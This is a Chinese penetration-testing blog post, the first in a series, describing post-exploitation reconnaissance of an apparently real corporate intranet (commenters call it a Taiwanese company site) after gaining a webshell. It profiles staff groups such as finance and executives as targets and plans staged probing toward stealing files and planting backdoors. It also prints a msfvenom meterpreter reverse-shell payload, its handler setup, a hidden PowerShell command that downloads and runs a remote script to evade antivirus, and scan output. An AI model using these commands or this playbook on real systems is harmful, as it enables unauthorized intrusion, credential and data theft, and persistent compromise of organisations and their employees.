渗透的本质是信息搜集(第一季)

2018-03-02 10,001

目标资产信息搜集的程度,决定渗透过程的复杂程度。

目标主机信息搜集的深度,决定后渗透权限持续把控。

渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。

----Micropoor

文章将连载,从几方面论证,渗透的本质是信息搜集。

一次完整的网络渗透,不仅仅是与目标管理人员的权限争夺,一次完整的网络渗透,它分为两大块,技术业务信息分析业务

技术业务要辅助并且要为信息分析业务提供强大的支撑与保证。同时信息分析业务要为技术业务提供关键的目标信息分析逻辑关系与渗透方向




案例如下:(root/administrator下主动信息搜集)(有马赛克)

在得到一个webshell时,非root/administrator情况下对目标信息搜集至关重要,它会影响后期的渗透是否顺利,以及渗透方向。

目标主机分配了2个内网IP,分别为10.0.0.X与192.168.100.X

1.png 

得知部分服务软件,以及杀毒软件 NOD32,一般内网中为杀毒为集体一致。

2.png 

搜集补丁更新频率,以及系统 状况

3.png 

搜集安装软件以及版本,路径等。

4.png 

5.png 

域中用户如下。并且当前权限为 iis apppool\xxxx

6.png 

正如上面所说,技术业务需要辅助分析业务。在域组中,其中有几个组需要特别关注,在一般的大型内网渗透中,需要关注大致几个组

1)IT组/研发组 他们掌握在大量的内网密码,数据库密码等。

2)秘书组 他们掌握着大量的目标机构的内部传达文件,为信息分析业务提供信息,在反馈给技术业务来确定渗透方向

3)domain admins组 root/administrator

4)财务组 他们掌握着大量的资金往来与目标企业的规划发展,并且可以通过资金,来判断出目标组织的整体架构

5)CXX组 ceo cto coo等,不同的目标组织名字不同,如部长,厂长,经理等。

7.png 

以研发中心为例:研发中心共计4人。

并且开始规划信息刺探等级:

等级1确定某部门具体人员数量 如研发中心4人

等级2:确定该部门的英文用户名的具体信息,如姓名,联系方式,邮箱,职务等。以便确定下一步攻击方向

等级3:分别刺探白天/夜间 内网中所存活机器并且对应IP地址

等级4:对应人员的工作机内网IP,以及工作时间

等级5:根据信息业务反馈,制定目标安全时间,以便拖拽指定人员文件,或登录目标机器

等级6:制定目标机器后渗透与持续渗透的方式以及后门

 

刺探等级1

8.png 

刺探等级2

9.png 

10.png 

net user /domain 后得到域中用户,但需要在root/administrator权限下得到更多的信息来给信息分析业务提供数据,并确定攻击方向。

 

在案例中针对nod32,采用powershell payload

 

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xx -f psh-reflection >xx.ps1

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost xxx.xxx.xxx.xxx

lhost => xxx.xxx.xxx.xxx

msf exploit(handler) > set lport xxx

lport => xxx

msf > run

 

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.xxx/xxx.ps1');"

注意区分目标及系统是32位还是64位。

11.png 

12.png 

13.png 

14.png 

15.png 

接下来将会用 IIS APPPOOL\XXXX 的权限来搜集更多有趣的信息

16.png 

某数据库配置 for mssql

17.png 

18.png 

白天测试段10.0.0.x段在线主机 for windows (部分)

19.png 

10.0.0.x 段信息刺探:

IP 1-50 open 3389 (部分)

20.png 

[+] 10.0.0.2: - 10.0.0.2:3389 - TCP OPEN

[+] 10.0.0.3: - 10.0.0.3:3389 - TCP OPEN

[+] 10.0.0.5: - 10.0.0.5:3389 - TCP OPEN

[+] 10.0.0.7: - 10.0.0.7:3389 - TCP OPEN

[+] 10.0.0.9: - 10.0.0.9:3389 - TCP OPEN

[+] 10.0.0.12: - 10.0.0.12:3389 - TCP OPEN

[+] 10.0.0.13: - 10.0.0.13:3389 - TCP OPEN

[+] 10.0.0.14: - 10.0.0.14:3389 - TCP OPEN

[+] 10.0.0.26: - 10.0.0.26:3389 - TCP OPEN

[+] 10.0.0.28: - 10.0.0.28:3389 - TCP OPEN

[+] 10.0.0.32: - 10.0.0.32:3389 - TCP OPEN

 

IP 1-255 open 22,25 (部分)

21.png 

[+] 10.0.0.3: - 10.0.0.3:25 - TCP OPEN

[+] 10.0.0.5: - 10.0.0.5:25 - TCP OPEN

[+] 10.0.0.14: - 10.0.0.14:25 - TCP OPEN

[+] 10.0.0.15: - 10.0.0.15:22 - TCP OPEN

[+] 10.0.0.16: - 10.0.0.16:22 - TCP OPEN

[+] 10.0.0.17: - 10.0.0.17:22 - TCP OPEN

[+] 10.0.0.20: - 10.0.0.20:22 - TCP OPEN

[+] 10.0.0.21: - 10.0.0.21:22 - TCP OPEN

[+] 10.0.0.31: - 10.0.0.31:22 - TCP OPEN

[+] 10.0.0.38: - 10.0.0.38:22 - TCP OPEN

[+] 10.0.0.40: - 10.0.0.40:22 - TCP OPEN

[+] 10.0.0.99: - 10.0.0.99:22 - TCP OPEN

[+] 10.0.0.251: - 10.0.0.251:22 - TCP OPEN

[+] 10.0.0.254: - 10.0.0.254:22 - TCP OPEN

 

IP 1-255 smtp for version (部分)

22.png 

msf auxiliary(smtp_version) > run

 

[+] 10.0.0.3:25 - 10.0.0.3:25 SMTP 220 xxxxxxxxxxxxxxxxx MAIL Service, Version: 7.5.7601.17514 ready at Wed, 14 Feb 2018 18:28:44 +0800 \x0d\x0a

[+] 10.0.0.5:25 - 10.0.0.5:25 SMTP 220 xxxxxxxxxxxxxxxxx Microsoft ESMTP MAIL Service, Version: 7.5.7601.17514 ready at Wed, 14 Feb 2018 18:29:05 +0800 \x0d\x0a

[+] 10.0.0.14:25 - 10.0.0.14:25 SMTP 220 xxxxxxxxxxxxxxxxxt ESMTP MAIL Service, Version: 7.0.6002.18264 ready at Wed, 14 Feb 2018 18:30:32 +0800 \x0d\x0a

23.png 

iis apppool\xxxx的权限下,目前得知该目标内网分配段,安装软件,杀毒,端口,服务,补丁更新频率,管理员上线操作时间段,数据库配置信息,域用户详细信息(英文user对应的职务,姓名等),以上数据等待信息分析业务,来确定攻击方向。如财务组,如cxx组等。并且完成了刺探等级1-4

 

而在以上的信息搜集过程中,提权不在是我考虑的问题了,可以Filezilla server 提权,mssqsl数据库提权,win03 提权,win2000提权,win08提权,iis.x提权,内网映射提权 等。而现在需要做的是如何反制被发现来制定目标业务后门,以便长期控制。

 

下一季的连载,将会从三方面来讲述大型内网的信息刺探,既有0day的admin权限下刺探,无提权下的guest/users权限下刺探。数据库下的权限刺探。域权限延伸到办公PC机的信息刺探。以及只有路由权限下的信息刺探。原来在渗透过程中,提权是次要的,信息刺探才是渗透的本质。

 

文章的结尾处按照前几季的风格,依然插入一个段子,一个真实的段子:

某大佬:你给我要exp,我什么exp都有吗?提权都靠exp吗?那别做了。
30分钟后
某大佬:恩,权限拿下来了。
:我操,怎么提的,X哥。
某大佬:它的数据库配置文件密码,跟ftp密码组合碰撞。root
某大佬:不是每个提权都靠exp,好不容易打点个,没exp,难道就不做了。提权的本质是信息搜集,搜集目标的补丁情况,第三方等一切可能利用的。
从那以后,我对提权只有4个字:信息搜集。
同样今天变成老家伙的我,也希望把这条经验传递下去。

 


Tags:
评论  (5)
快来写下你的想法吧!
  • 找小明 2018-03-04 18:37:44

    老哥强啊!

  • 大表哥 2018-03-04 20:51:01

    学习亮哥 信息收集 分析内网结构 拿下域控撸穿内网。

  • 天王盖地虎 2018-03-04 20:52:54

    台湾站。。

  • use 2018-03-08 12:26:50

    台湾企业站

  • 一叶知秋 2018-04-28 9:42:02

    不是说有杀软嘛。msf生成的powershell脚本能直接过杀软?遇到差不多的站,提权不了,只能代理找其他的段的洞

Micropoor

文章数:9 积分: 55

任何行业做久了,你都会发现那里是个江湖。

关注我们